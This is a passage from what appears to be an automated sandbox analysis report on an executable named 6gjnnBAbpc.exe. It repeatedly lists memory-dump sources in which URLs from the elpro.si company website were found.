memory: https://www.elpro.si/?s=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/avtorji/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/calex/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/comet/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/ebro/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/ecom/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/elpro-laboratorij-za-kalibracije/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/elpro-lepenik/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/elpro/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/handheld/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/inor/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/jola/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/michell/
